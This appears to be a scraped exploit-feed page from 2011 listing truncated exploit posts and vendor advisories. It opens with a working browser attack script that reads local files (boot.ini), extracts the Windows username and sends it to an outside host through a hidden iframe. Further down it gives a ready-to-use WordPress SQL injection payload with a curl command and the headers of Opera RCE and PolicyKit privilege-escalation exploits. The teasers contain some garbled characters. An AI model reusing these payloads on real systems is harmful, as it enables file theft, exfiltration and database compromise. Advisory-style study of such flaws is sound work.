Send attenment demo.htm

Code:

<script>

xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");

xmlhttp.open("GET","../../../../../../../../../../../../../../boot.ini",false);

xmlhttp.send();

alert(xmlhttp.responseText);

</script>

 

Information:

<script>alert(document.URL)</script>

Get dir info

C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\OLKxxx

Demo:

<script>

var path = document.URL;

var regx = /Settings\\(.*)\\Local/ var rs= regx.exec(path); username=rs[1];

iframe_dom("http://www.80vul.com/hackgame/xs-g0.php?username="+username);

function iframe_dom(script_filename) {

    var d = window.document;

    var newIframe = d.createElement('iframe');

    newIframe.src=script_filename;

    newIframe.style.width = 0;

    newIframe.style.height = 0;

    d.appendChild(newIframe);

    return false;

} </script>

################################################################### Exploit for Opera 10/11 (bad nesting with frameset tag) Memory Corruption
#
# Vulnerability:
#
# Discovered: 2010-08-18
# Patched: 2011-05-18
# Tested on: v10.xx (v10.00, v10.01, v10.10, v10.50, v10.51, v10.52, v10.53, v10.54, v10.6, v10.61, v10.62 and v10.63)
#                           v11.xx < v11.11 (v11.00, v11.01 and v11.10)
# Patched on: v11.11
#
# Exploit:
#
# Coded: 2010-09-23
# Last revision: 2011-09-30
#
# RCE on: v10.00, v10.50, v10.51, v10.52, v10.54, v10.60, v10.62, v11.00, v11.01 and v11.10*
# DoS on: v10.01, v10.10, v10.53, v10.61

… Read the rest

/* polkit-pwnage.c
*
*
* ==============================
* =      PolicyKit Pwnage      =
* =          by zx2c4          =
* =        Sept 2, 2011        =
* ==============================
*
*
* Howdy folks,
*
* This exploits CVE-2011-1485, a race condition in PolicyKit.
*
* davidz25 explains:
*
* –begin–
* Briefly, the problem is that the UID for the parent process of pkexec(1) is
* read from

… Read the rest

http://www.cisco.com/warp/public/707/cisco-sa-20110928-ipv6.shtml

Revision 1.1

Last Updated 2011 September 30 2330 UTC (GMT)

For Public Release 2011 September 28 1600 UTC (GMT)

Contents

Summary
Affected Products
Details
Vulnerability Scoring Details
Impact
Software Versions and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

Summary

Cisco IOS Software contains a vulnerability in the IP version 6 (IPv6) protocol stack implementation that could allow an unauthenticated, remote attacker to cause a reload of… Read the rest

Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site
Scripting issues.

2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model鈥搗iew鈥揷ontroller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support… Read the rest

# Exploit Title: WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.7 (tested)
 
—————
PoC (POST data)
—————
http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
 
e.g.
curl –data "limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
 
—————
Vulnerable code
—————
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    …
    $limit = intval($_POST['limit']);
    $page_offset = (intval($_POST['offset']) – 1) * $limit;
 

… Read the rest

Excel is the spreadsheet application included with Microsoft Corp.’s Office productivity software suite. More information is available at the following website:

http://office.microsoft.com/excel/

II. DESCRIPTION

Remote exploitation of an integer signedness vulnerability in Microsoft Corp.’s Excel could allow an attacker to execute arbitrary code with the privileges of the current user.

The vulnerability is an integer signedness issue that leads to an invalid array indexing vulnerability. It is triggered by a certain record with a negative ‘iax’ field.

It is possible to pass negative 16-bit values, which are later sign extended to 32 bits. The sign… Read the rest

[+] Info=======================================================

[-] Exploit Title: cPanel < 11.30.2 Multiple CSRF Vulnerabilities
[-] Author: Net.Edit0r
[-] Home : Black-HG.Org ~ h4ckcity.org
[-] Version: 11.30.2
[-] Software Link: http://cpanel.net
[-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net
[-] Date : 27/08/2011
[-] CVE : N/A
[-] Vedio Demo : http://www.black-hg.org/Vedioz/cpanel.rar
[-] Tnx2 : A.Cr0x & 3H34N & 4m!n & Cyrus & tHe.k!ll3r & Mr.XHat & Mikili

[+] Exploit=====================================================

[-]  Introduction :

cPanel versions below and excluding 11.30.2 , are vulnerable to CSRF which
leads to Change email address script of

… Read the rest

Since they saw their implementation, can not fail to output something.  Just did not update the… Read the rest

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.20
- Tomcat 6.0.0 to 6.0.33
- Tomcat 5.5.0 to 5.5.33
- Earlier, unsupported versions may also be affected

Description:
Apache Tomcat supports the AJP protocol which is used with reverse
proxies to pass requests and associated data about the request from the
reverse proxy to Tomcat. The AJP protocol is designed so that when a
request includes a request body, an unsolicited AJP message is sent to
Tomcat that includes the first part (or possibly all) of… Read the rest